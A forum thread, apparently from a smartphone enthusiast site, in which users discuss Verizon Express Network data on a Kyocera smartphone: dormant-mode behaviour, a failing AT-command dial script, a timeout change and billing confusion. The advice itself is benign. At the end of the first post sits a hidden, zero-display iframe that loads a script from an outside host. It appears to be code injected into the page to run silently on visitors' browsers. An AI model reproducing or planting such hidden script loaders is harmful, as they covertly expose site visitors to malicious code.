+ Reply to Thread
Results 1 to 13 of 13
  1. #1
    Registered User
    Join Date
    02-20-2002
    Location
    Atlanta, GA
    Posts
    173

    Strange Behavior with Express Network

    I'm finding that after a data session with the Express Network (high speed) connection, the phone enters a high packet data "dormant mode" state. In this state you can receive phone calls -- which is very nice...

    What's been strange though, is that after the connection goes dormant and I try to close the connection and close the flip, the phone then tries to dial a new #777 connection. When I press the "hang up" key again it stops and the connection is really closed.

    Does anyone know of a way to stop it from trying to dial in after EN goes dormant? Thanks,

    Mark<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184

    Re: Strange Behavior with Express Network

    Originally posted by mhzimmer
    I'm finding that after a data session with the Express Network (high speed) connection, the phone enters a high packet data "dormant mode" state. In this state you can receive phone calls -- which is very nice...

    What's been strange though, is that after the connection goes dormant and I try to close the connection and close the flip, the phone then tries to dial a new #777 connection. When I press the "hang up" key again it stops and the connection is really closed.

    Does anyone know of a way to stop it from trying to dial in after EN goes dormant? Thanks,

    Mark
    Close the flip... It will shut down the connection within a few seconds on it's own.

    Some of us consider it a bug that it cloese the dorment connection when you shut the flip, but in this case, it should do what you need....

  3. #3
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184

    Re: Re: Strange Behavior with Express Network

    Originally posted by alanb
    Close the flip... It will shut down the connection within a few seconds on it's own.

    Some of us consider it a bug that it cloese the dorment connection when you shut the flip, but in this case, it should do what you need....
    Update..... Further experimentation has shown that EXpress Network will NOT disconnect if you close the flip in Dorment mode until Verizon times out (5 minutes of inactivity). However, if you close the flip during an active data session, it will disconnect within a few seconds.

    This bodes well for those wanting an "always on" connection. A program that can periodically send some data (list SnapperMail) could maintain the connection, or if Verizon changes their timeout policy with their rumoured upcoming EN price changes, we won't have a limit in the phone which prevents us from taking advantage....

    Alan

  4. #4
    Registered User
    Join Date
    01-18-2003
    Posts
    18

    Express Network

    Hey guys,

    So far, this is an amazing phone. I got it activated with some trouble, but it's working There are a few little things that are disadvantages, but the advantages outweigh them 10,000 fold.
    And so far I'm only using a Phone/PDA.

    I can't get the Express Network to work. I checked the FAQ without any luck. I have talked for hours to many Verizon customer service reps (the ones that deal with Express Network), and the final word is that "Everything from our part is correct, it's the phone".

    When they activated my phone, they gave me 2 phone #'s, one for a Voice Plan, and one for $99.99 Unlimited EN plan. When I called customer service, they told me that was wrong and they changed it to 1 phone number, with the $99.99 EN as an added on feature. I can log onto QNC, but not EN. I use the scripts that are in the FAQ and get an error: "Error: authentication failure (0x1233)". The script is:

    Send: at$qcmdr=3
    Send CR:
    Send: at$qnqnc=0
    Send CR:
    End:

    I've tried a 1 where the zero is, without help.

    The guy at Verizon said that "Data" is activated on my account and that something is wrong on Kyocera's part, and that is why Verizon does not support the phone yet. He referred me to Kyocera support.

    If anyone can help, I'd appreciate it highly. Otherwise, I'll probably have to stick to QNC. Thanks Again.

    Oh yeah, this Smartphone is awesome!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

  5. #5
    Registered User
    Join Date
    07-08-2002
    Posts
    41

    EN

    Try settinq up a new EN connection using the settinqs you used in your last post.

  6. #6
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Also, make sure you check the user name/password. I had the password wrong in the FAQ until a couple of days ago. Should be vzw.

    Alan

  7. #7
    Registered User
    Join Date
    10-03-2002
    Posts
    201

    Re: Strange Behavior with Express Network

    Originally posted by mhzimmer
    I'm finding that after a data session with the Express Network (high speed) connection, the phone enters a high packet data "dormant mode" state. In this state you can receive phone calls -- which is very nice...

    What's been strange though, is that after the connection goes dormant and I try to close the connection and close the flip, the phone then tries to dial a new #777 connection. When I press the "hang up" key again it stops and the connection is really closed.

    Does anyone know of a way to stop it from trying to dial in after EN goes dormant? Thanks,

    Mark
    Mark,

    There are a lot of other problems that you will find when using EN both with a PDA and a laptop. In certain cases, the phone side of the phone will shut off, and in other cases, the phone will lockup (usually after the phone side shots off).

    For now, I would stay away from dormant connections, and make sure that you close any EN connection with your laptop or the pda app that made the connection before doing anything else (like switching in and out of the phone app).

    I bet the real Verizon firmware will clean up most of this...

    Glenn

  8. #8
    Registered User
    Join Date
    01-18-2003
    Posts
    18

    :(

    I still can't connect to Express Network. Kyocera says it's Verizon's fault. Verizon says that this is why they don't support the phone, because of the problems with the express network.
    Anyone have a clue????

    Guess I have to stick with QNC. Well, it's cheaper anyway. By the way, this smartphone is so awesome.

  9. #9
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184

    Re: Re: Re: Strange Behavior with Express Network

    Originally posted by alanb
    Update..... Further experimentation has shown that EXpress Network will NOT disconnect if you close the flip in Dorment mode until Verizon times out (5 minutes of inactivity). However, if you close the flip during an active data session, it will disconnect within a few seconds.

    This bodes well for those wanting an "always on" connection. A program that can periodically send some data (list SnapperMail) could maintain the connection, or if Verizon changes their timeout policy with their rumoured upcoming EN price changes, we won't have a limit in the phone which prevents us from taking advantage....

    Alan
    The changes in Express Network are starting. Saw this posted on news:alt.cellular.verizon

    On Feb. 6th, the inactivity timer for the Unlimited Express Network
    plans and features will be changed from 5 minutes to 2 hours. No longer
    will you have to reinitiate your sessions unless there is no data
    exchange within a 2 hour period


    I wasn't going to post anything becuase last time I noticed a change, as soon as I posted they stopped it, but I had actually noticed for the past three days that I could stay in dormant mode as long as I wanted without Verizon disconnecting me. Currently I have had a data session open for over 12 hours, mostly dorment (not sure why I am not being disconnected after 2 hours if that is the new timeout setting, but I am not complaining).

    Alan

  10. #10
    Registered User
    Join Date
    07-31-2002
    Posts
    228
    Would it be correct to assume that this change will only benefit those with the megabyte plans (eg, 10 megs for $35) or unlimited, but those who use EN with minutes will still get charged minutes even if in dormant mode?

  11. #11
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Originally posted by pdadoc
    Would it be correct to assume that this change will only benefit those with the megabyte plans (eg, 10 megs for $35) or unlimited, but those who use EN with minutes will still get charged minutes even if in dormant mode?
    You would probably want to check with Verizon on that. i am not too clear on how the per/minute billing works on EN. You can always set a timeout in the network settings on the phone if you do get charged for dormant minutes.

    Alan

  12. #12
    Registered User
    Join Date
    09-15-2002
    Posts
    109
    Originally posted by alanb
    . . . . i am not too clear on how the per/minute billing works on EN.

    Alan
    I'm not sure the people at Verizon understand how the billing works either. I spent an hour or so on the phone with Verizon questioning how excess usage (over and above the 10 megabyte EN plan I had) was tallied. No real KB usage was shown, just minutes. There was no way, for example, that I could have used the 2350 minutes they were charging me for. Nobody I talked to could give me an answer, so I dropped the EN and went back to a regular plan and they threw in Mobile Web, and refunded the "excess" charges. Even now, I STILL am not quite sure what we did, and niether do they, I suppose.

    I only use the data side to check email mainly, ocassionally checking weather,news and movies. I guess I don't really need EN anyway.

    Please know that even though uninformed and unable to help me with my questions, Verizon support and customer service people still are the best I've encountered. I just hope their training improves.

  13. #13
    Registered User
    Join Date
    08-17-2002
    Posts
    444
    While I agree that VZW support tends to try, they are not usually on top of things. I called VZW about two weeks ago to sign up for EN. The rep I talked to insisted that the first free month promotion was no longer available, no matter how hard I tried to get him to give it to me. Still wanting to try EN, I signed up for the 10 meg plan. Yesterday I got the confirmation letter from VZW about my plan change and it has me down for the 1 free month promotion! In any event, I am going to drop it at the end of the month. Like The Larch, I don't use it enough to justify $35 month. Of course, if it was $10/ month for unlimited, I would definitly go for it. (Are you listening now, VZW?)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts